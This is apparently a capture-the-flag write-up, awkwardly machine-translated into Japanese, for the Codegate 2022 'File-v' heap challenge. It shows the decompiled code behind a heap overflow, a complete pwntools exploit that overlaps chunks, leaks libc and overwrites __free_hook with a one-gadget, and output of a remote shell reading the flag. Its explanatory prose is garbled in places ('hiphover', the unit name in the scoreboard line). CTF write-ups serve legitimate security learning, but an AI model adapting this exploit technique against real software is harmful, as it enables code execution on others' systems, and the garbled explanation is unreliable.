[Codegate 2022 Preliminary] File-v


Scoreboard
Soongsil Univ->SSU->海軍海難救援戦隊
崇実大学に所属し、2022年にコドゲイト大学部に参加.
Ponableを解くことにしたけど...パイロットの先辈たちが解いてくれたので一つ解けました.
一緒に出てきたIsolatedは脆弱点フリップフロップで、RIPまで0x4141414141414141で入手していたのですが、どういうわけか、VMが自分の意思で動いていた問題で、Shellは入手できませんでした.
残念ながら公式戦まではまだまだ時間がありますので、より良い一面をお見せできるように頑張ります😁
Vuln - Unintended
		ccontent = input_by_size_return_malloc(content_size);
    filesize = ptr->filesize;
    v7 = content;
    v8 = malloc(ptr->filesize - ptr->content_size + content_size);
    memcpy(v8, ptr, filesize);
    v8->modify_time = time(0LL);
    filename_size = v8->filename_size;
    v8->content_size = content_size;
    memcpy(&v8->filename + (filename_size + 1), v7, content_size);
v8 = malloc()を行うと、寸法設定が不適切であるため、次のmemcpyに次のブロックを部分的に覆うことができるhiphoverが現れる.
2479142をブロックに重ねて作成し、Fake Chunkを操作し、自由吸分配を得て乾杯する.
弱点自体は簡単ですが、お尻に合わせるのにかなりの時間がかかります.
Exploit - Unintended
from pwn import *

p = remote("3.36.184.9", 5555)
#p = process("./file-v")
#p = process("./file-v_patched")
l = ELF('./libc-2.27.so')

def create(_size, _filename):
    p.sendafter("> ", "c")
    p.sendafter(": ", str(_size))
    p.sendafter(": ", _filename)

def select(_filename):
    p.sendafter("> ", 'b')
    p.sendafter(": ", _filename)

def back(_opt=None):
    p.sendafter("> ", "b")
    if _opt:
        p.sendafter("> ", _opt)

def edit_filename(_len, _filename):
    p.sendafter("> ", '1')
    p.sendafter(": ", str(_len))
    p.sendafter(": ", _filename)

def edit_content(_size, _filecontent):
    p.sendafter("> ", '4')
    p.sendafter(": ", str(_size))
    p.sendafter(": ", _filecontent)

def show_content():
    p.sendafter("> ", '3')

create(1, 'a')
select('flag')
edit_content(46, '\xde'*(43-0x10) + p64(0x21) + p64(0) + "\x61")
p.sendafter("> ", '5')
back()

select('a')
edit_filename(1, "a")
edit_content(100, 'b' + p64(0)*3 + p64(0x51))

back("N")
pay = p64(0xdadadadadadadada)
pay += p64(0x11)

select(pay*0x80 + p64(0) + p64(0x801))
select('a')
edit_content(100, 'q')

pay = 'qqqqqq'
pay += p64(0)
pay += p64(0x501)

edit_content(100, pay)
show_content()

libc = int(''.join(p.recvuntil("7f")[-17:].split(" ")[::-1]), 16) - 96 - 0x10 - l.sym['__malloc_hook']
log.info('[Libc] : ' + hex(libc))

pay = 'x'*6
pay += p64(0)
pay += p64(0x81)
pay += 'A'*0x10
pay += p64(0)*3
pay += p64(0x71)

pay += 'W'*2
pay += p64(0x181)
pay += p64(0)
pay += p64(0x11)

pay = pay.ljust(100, 'W')
edit_content(100, pay)
#edit_filename(10, 'a')
#edit_filename(10, 'a')

pay = 'a'*6
pay += p64(0)
pay += p64(0x101) # unsorted size
pay += p64(0x41414141414141)
#pay += p64(heap+0x2bb0)
pay += p64(libc + l.sym['__malloc_hook'] + 96 + 0x10)

pay += '\x00'*2
pay += p64(0x71)
pay += p64(libc + l.sym['__free_hook'])
pay = pay.ljust(0x70-2, 'z')
pay += '\x21\x00'
edit_content(0x70, pay)

p.sendafter("> ", 'd') # delete file

select('flag')
p.sendafter("> ", 'd') # delete file

create(0x8, '/bin/sh\x00')
select('/bin/sh\x00')

edit_content(0x40, 'q')

one = [0x10a428, 0x10a41c, 0xe5622, 0xe561e, 0xe5617, 0xe546f,0x4f432,0x4f3d5]
#pay = p64(libc + l.sym['system'])
#pay = p64(libc + 0x4f432)
#pay = p64(libc + 0x10a41c)
#pay = p64(libc + 0x4f3d5)

pay = p64(libc + one[4])
edit_content(0x60, pay)
#back("N")
p.interactive()
[*] [Libc] : 0x7f1981fdb000
[*] Switching to interactive mode
$ ls
README.md.v
file-v
flag
flag.v
run.sh
$ cat flag
codegate2022{1815a4f99fa94588302edfa520191386ad614c9863684e9e6904b60262d9624d0c93f11555f9edcf8621b3ba3ebf882dadc3d90ffe6a813d}
$